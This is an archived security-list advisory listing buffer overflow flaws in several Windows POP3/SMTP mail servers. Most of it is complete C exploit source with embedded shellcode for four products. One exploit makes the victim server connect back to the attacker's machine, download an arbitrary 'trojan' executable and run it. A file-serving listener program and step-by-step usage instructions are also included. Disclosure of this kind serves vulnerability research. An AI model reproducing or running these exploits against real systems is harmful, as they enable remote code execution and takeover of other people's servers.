Many kind of POP3/SMTP server softwares for Windows have buffer overflow bug (by The Shadow Penguin Securuty http://shadowpenguin.backsection.net) 1. Introduction I confirmed many kind of POP3/SMTP servers for Windows which are published on "SOFT-SEEK.com" contain the buffer overflow bugs. I list the softwares which have buffer overflow bug, I also publish the exploit programs for some software. 2. POP3/SMTP server softwares which have buffer overflow bugs Software Version Service Overflow Point ------------------------------------------------------- @Work SmartServer3 3.51 SMTP long MAIL FROM: CMail Server 2.3 SP2 SMTP long MAIL FROM: Personal Mail Server 3.09 SMTP long MAIL FROM: (I've notified to developer) Tiny FTP daemon 0.51 POP3 long USER (I've notified, Now fixed) Internet Anywhere 2.2.2 POP3 long USER FuseMail 2.7 POP3 long USER,PASS aVirt Mail Server 3.3 POP/SMTP long MAIL FROM:,long USER If the host recives the packet which contains the exploit code, the host has been cracked by any instructions which are coded in the exploit code. We show the demonstration programs which execute any command on the victim host. For the proof of the risk of intrusion, I also publish the exploit program for "Personal Mail Server" that can send a prepared program to victim host and execute it. If the trojan program is sent, the victim machine will be controlled remotely. If the host receives the packet which contains the exploit code, the host will execute any instructions that is written in the exploit code. We show the demonstration programs which execute any command on the victim host. For the proof of the risk of intrusion, I publish the exploit program for "Personal Mail Server" that can send a trojan program which is prepared in the attacker host. Of course, it can be executed remotely. If the trojan program is sent, the victim machine will be controlled remotely. 3. Exploit I coded the exploits for the following softwares: (1) @Work SmartServer3 (2) CMail Server (3) FuseMail 2.7 (4) Personal Mail Server (5) Tiny FTP daemon (5) is now fixed, I publish the exploit program for (1)-(4) ------------------- (1) @Work SmartServer3 /*============================================================================= NetcPlus SmartServer3 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguinat_private) ============================================================================= */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <unistd.h> #define BUFSIZE 2000 #define SMTP_PORT 25 #define RETADR 1167 #define JMPADR 1163 #define JMPOFS 6 #define EIP 0xbff7a06b #define NOP 0x90 #define JMPS 0xeb unsigned char exploit_code[200]={ 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B, 0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF, 0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52, 0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28, 0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF, 0xFF,0x00}; unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe"; int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[BUFSIZE+3000],buf[BUFSIZE]; int sockfd,i,ip; if (argc<2){ printf("usage\n %s HostName\n",argv[0]); exit(1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(SMTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); exploit_code[65]=strlen(cmdbuf+23); memset(buf,0x90,BUFSIZE); ip=EIP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR] =JMPS; buf[JMPADR+1]=JMPOFS; memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); buf[2000]=0; sprintf(packetbuf,"helo penguin\r\n"); write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } printf("%s\n",packetbuf); sprintf(packetbuf,"MAIL FROM: %s\r\n",buf); write(sockfd,packetbuf,strlen(packetbuf)); sleep(100); close(sockfd); } ------------------- (2) CMail Server /*============================================================================= CMAIL Server 2.3 SP2 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguinat_private) ============================================================================= */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <unistd.h> #define BUFSIZE 2000 #define SMTP_PORT 25 #define RETADR 626 #define JMPADR 622 #define JMPOFS 6 #define EIP 0xbff7a06b #define NOP 0x90 #define JMPS 0xeb unsigned char exploit_code[200]={ 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B, 0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF, 0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52, 0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28, 0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF, 0xFF, 0x00}; unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe"; int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[BUFSIZE+3000],buf[BUFSIZE]; int sockfd,i,ip; if (argc<2){ printf("usage\n %s HostName\n",argv[0]); exit(1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(SMTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); exploit_code[65]=strlen(cmdbuf+23); memset(buf,0x90,BUFSIZE); ip=EIP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR] =JMPS; buf[JMPADR+1]=JMPOFS; memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); buf[BUFSIZE]=0; sprintf(packetbuf,"helo penguin\r\n"); write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } printf("%s\n",packetbuf); sprintf(packetbuf,"MAIL FROM: aa <%sat_private>\r\n",buf); write(sockfd,packetbuf,strlen(packetbuf)); sleep(100); close(sockfd); } ------------------- (4) FuseMail 2.7 /*============================================================================= FuseMail Version 2.7 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguinat_private) ============================================================================= */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <unistd.h> #define BUFSIZE 1159 #define RETADR 1074 #define FTP_PORT 110 #define JMP_ESP 0xbff7a027 unsigned char exploit_code[200]={ 0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3, 0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7, 0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF, 0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF, 0xFF,0x00 }; unsigned char cmdbuf[200]="msvcrt.dll.system.notepad.exe"; int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[3000],buf[1500]; int sockfd,i,ip; if (argc<2){ printf("usage\n %s HostName\n",argv[0]); exit(1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(FTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); memset(buf,'a',BUFSIZE); buf[BUFSIZE]=0; ip=JMP_ESP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; strncpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); sprintf(packetbuf,"USER %s\r\n",buf); write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } memset(packetbuf,0,1024); sprintf(packetbuf,"PASS sample\r\n"); write(sockfd,packetbuf,strlen(packetbuf)); close(sockfd); } ------------------- (4) Personal Mail Server Prog.1 : This program sends the very small client program which can execute the trojan after the translation from other host. Prog.2 : Program Translation Server. The Program Translation Server which is used by Prog.1 Prog.1 /*============================================================================= Personal Mail Server Version 3.072-3.09 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguinat_private) ============================================================================= */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <unistd.h> #define BUFSIZE 4000 #define SMTP_PORT 25 #define RETADR 267 #define JMPADR 263 #define JMPOFS 6 #define EIP 0xbff7a06b #define NOP 0x90 #define JMPS 0xeb unsigned char exploit_code[700]={ 0xEB,0x58,0x5F,0x32,0xC0,0x8B,0xDF,0x33,0xC9,0xB1,0x09,0xFE,0xC1,0x03,0xD9,0x88, 0x03,0x88,0x47,0x16,0x88,0x47,0x21,0x88,0x47,0x28,0x88,0x47,0x30,0x88,0x47,0x35, 0x88,0x47,0x41,0x88,0x47,0x47,0x88,0x47,0x4E,0x88,0x47,0x55,0x88,0x47,0x58,0x88, 0x47,0x5E,0x88,0x47,0x65,0x88,0x47,0x6A,0x8B,0xC7,0x50,0xB8,0x50,0x77,0xF7,0xBF, 0xFF,0xD0,0x89,0x47,0x6E,0x8B,0xC7,0x33,0xC9,0xB1,0x0B,0x03,0xC1,0x50,0xB8,0x50, 0x77,0xF7,0xBF,0xFF,0xD0,0x89,0x47,0x72,0xEB,0x02,0xEB,0x72,0x8B,0xC7,0x33,0xC9, 0xB1,0x17,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B, 0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0x33,0xC0,0xB0,0x02,0x50,0xFF, 0xD6,0x57,0x33,0xC9,0xB1,0x82,0x03,0xF9,0x33,0xC9,0x66,0xB9,0x90,0x01,0x33,0xC0, 0xF3,0xAA,0x5F,0x8B,0xC7,0x33,0xC9,0xB1,0x22,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8, 0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,0x40,0x50,0x40,0x50,0xFF, 0xD6,0x89,0x47,0x76,0x8B,0xDF,0x33,0xC9,0xB1,0x82,0x03,0xD9,0xC6,0x03,0x02,0x66, 0xC7,0x43,0x02,0x1B,0x58,0xC7,0x43,0x04,0xEE,0xEE,0xEE,0xEE,0xEB,0x02,0xEB,0x56, 0x8B,0xC7,0x33,0xC9,0xB1,0x29,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0xB0,0x10,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82, 0x03,0xC1,0x50,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x42,0x03,0xC1, 0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33, 0xC9,0xB1,0x56,0x03,0xC1,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF, 0xD6,0x89,0x47,0x7A,0xEB,0x02,0xEB,0x63,0x8B,0xC7,0x33,0xC9,0xB1,0x31,0x03,0xC1, 0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50, 0x66,0xB8,0xE8,0x03,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0x77, 0x76,0xFF,0xD6,0x89,0x47,0x7E,0x33,0xDB,0x3B,0xC3,0x74,0x31,0x72,0x2F,0x8B,0xC7, 0x33,0xC9,0xB1,0x48,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF, 0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,0x77,0x7E,0x33,0xC0,0xB0,0x01,0x50,0x8B,0xC7, 0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0xD6,0xEB,0x9D,0xEB,0x6C,0x8B,0xC7,0x33, 0xC9,0xB1,0x36,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0, 0x8B,0xF0,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x4F,0x03,0xC1,0x50, 0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF, 0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x5F,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF, 0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x66,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0x53,0xFF,0xD0,0x90,0xE8,0x03,0xFE,0xFF,0xFF,0x6D, 0x73,0x76,0x63,0x72,0x74,0x2E,0x64,0x6C,0x6C,0x2C,0x77,0x73,0x6F,0x63,0x6B,0x33, 0x32,0x2E,0x64,0x6C,0x6C,0x2C,0x57,0x53,0x41,0x53,0x74,0x61,0x72,0x74,0x75,0x70, 0x2C,0x73,0x6F,0x63,0x6B,0x65,0x74,0x2C,0x63,0x6F,0x6E,0x6E,0x65,0x63,0x74,0x2C, 0x72,0x65,0x63,0x76,0x2C,0x63,0x6C,0x6F,0x73,0x65,0x73,0x6F,0x63,0x6B,0x65,0x74, 0x2C,0x66,0x6F,0x70,0x65,0x6E,0x2C,0x66,0x77,0x72,0x69,0x74,0x65,0x2C,0x66,0x63, 0x6C,0x6F,0x73,0x65,0x2C,0x77,0x62,0x2C,0x78,0x2E,0x65,0x78,0x65,0x2C,0x73,0x79, 0x73,0x74,0x65,0x6D,0x2C,0x65,0x78,0x69,0x74,0x2C,0x2C,0x2C,0x2C,0x00 }; int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[BUFSIZE+3000],buf[BUFSIZE]; int sockfd,i; unsigned int ip,port,yourip; if (argc<3){ printf("usage\n %s VictimHostName YourHostName\n",argv[0]); exit(1); } if ((yourip=inet_addr(argv[2]))==-1){ if ((hs=gethostbyname(argv[2]))==NULL){ printf("Can not resolve specified YourHost.\n"); exit(1); } memcpy((caddr_t)&yourip,hs->h_addr,hs->h_length); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(SMTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified VictimHost.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } printf("1:%s\n",packetbuf); memset(buf,0x90,BUFSIZE); for (i=267;i<271;i++) buf[i]=0x30; ip=EIP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR] =JMPS; buf[JMPADR+1]=JMPOFS; port=7000; exploit_code[0xc3]=(port>>8) & 0xff; exploit_code[0xc4]=port & 0xff; ip=htonl(yourip); exploit_code[0xc8]=(ip>>24) & 0xff; exploit_code[0xc9]=(ip>>16) & 0xff; exploit_code[0xca]=(ip>>8) & 0xff; exploit_code[0xcb]=ip & 0xff; memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); buf[BUFSIZE]=0; sprintf(packetbuf,"helo penguin\r\n"); write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } printf("%s\n",packetbuf); sprintf(packetbuf,"MAIL FROM: %s\r\n",buf); write(sockfd,packetbuf,strlen(packetbuf)); close(sockfd); } Prog.2 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/stat.h> #include <fcntl.h> #include <errno.h> #include <netinet/in.h> #include <arpa/inet.h> #define PORT_NUM 7000 #define BUFSIZE 1000 #define SENDFILE "test.exe" int get_connection(port, listener) int port; int *listener; { struct sockaddr_in address,acc; int listening_socket,connected_socket; int reuse_addr=1,acclen=sizeof(acc); memset((char *) &address, 0, sizeof(address)); address.sin_family = AF_INET; address.sin_port = htons(port); address.sin_addr.s_addr = htonl(INADDR_ANY); listening_socket = socket(AF_INET, SOCK_STREAM, 0); if (listening_socket < 0) { perror("socket"); exit(1); } if (listener != NULL) *listener = listening_socket; setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR, (void *)&reuse_addr,sizeof(reuse_addr)); if (bind(listening_socket,(struct sockaddr *)&address, sizeof(address))<0){ perror("bind"); exit(1); } listen(listening_socket, 5); connected_socket=accept(listening_socket, (struct sockaddr *)&acc,&acclen); return connected_socket; } int main(argc, argv) int argc; char *argv[]; { int sock,listensock,i,r,l; char buf[BUFSIZE]; struct stat st; FILE *fp; if ((fp=fopen(SENDFILE,"rb"))==NULL){ printf("File not found \"%s\"\n",SENDFILE); exit(1); } stat(SENDFILE,&st); r=st.st_size/BUFSIZE+1; sock = get_connection(PORT_NUM, &listensock); for (i=0;;i++){ l=fread(buf,1,BUFSIZE,fp); if (l<=0) break; write(sock,buf,l); } fclose(fp); close(sock); } << Demonstration >> Victim host : 192.168.200.200 Your host : 192.168.100.100 (1) copy your testprogram "test.exe" to UNIX machine. (2) gcc ex_pms1.c -o pms1 (3) gcc sendexp.c -o sendexp (4) ./sendexp & (5) ./pms1 192.168.200.200 192.168.100.100 You can send "test.exe" to victim host, and can execute it remotely. The size of "test.exe" is not limited. ----- The Shadow Penguin Security (http://shadowpenguin.backsection.net) Webmaster / UNYUN (shadowpenguinat_private)
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:03:09 PDT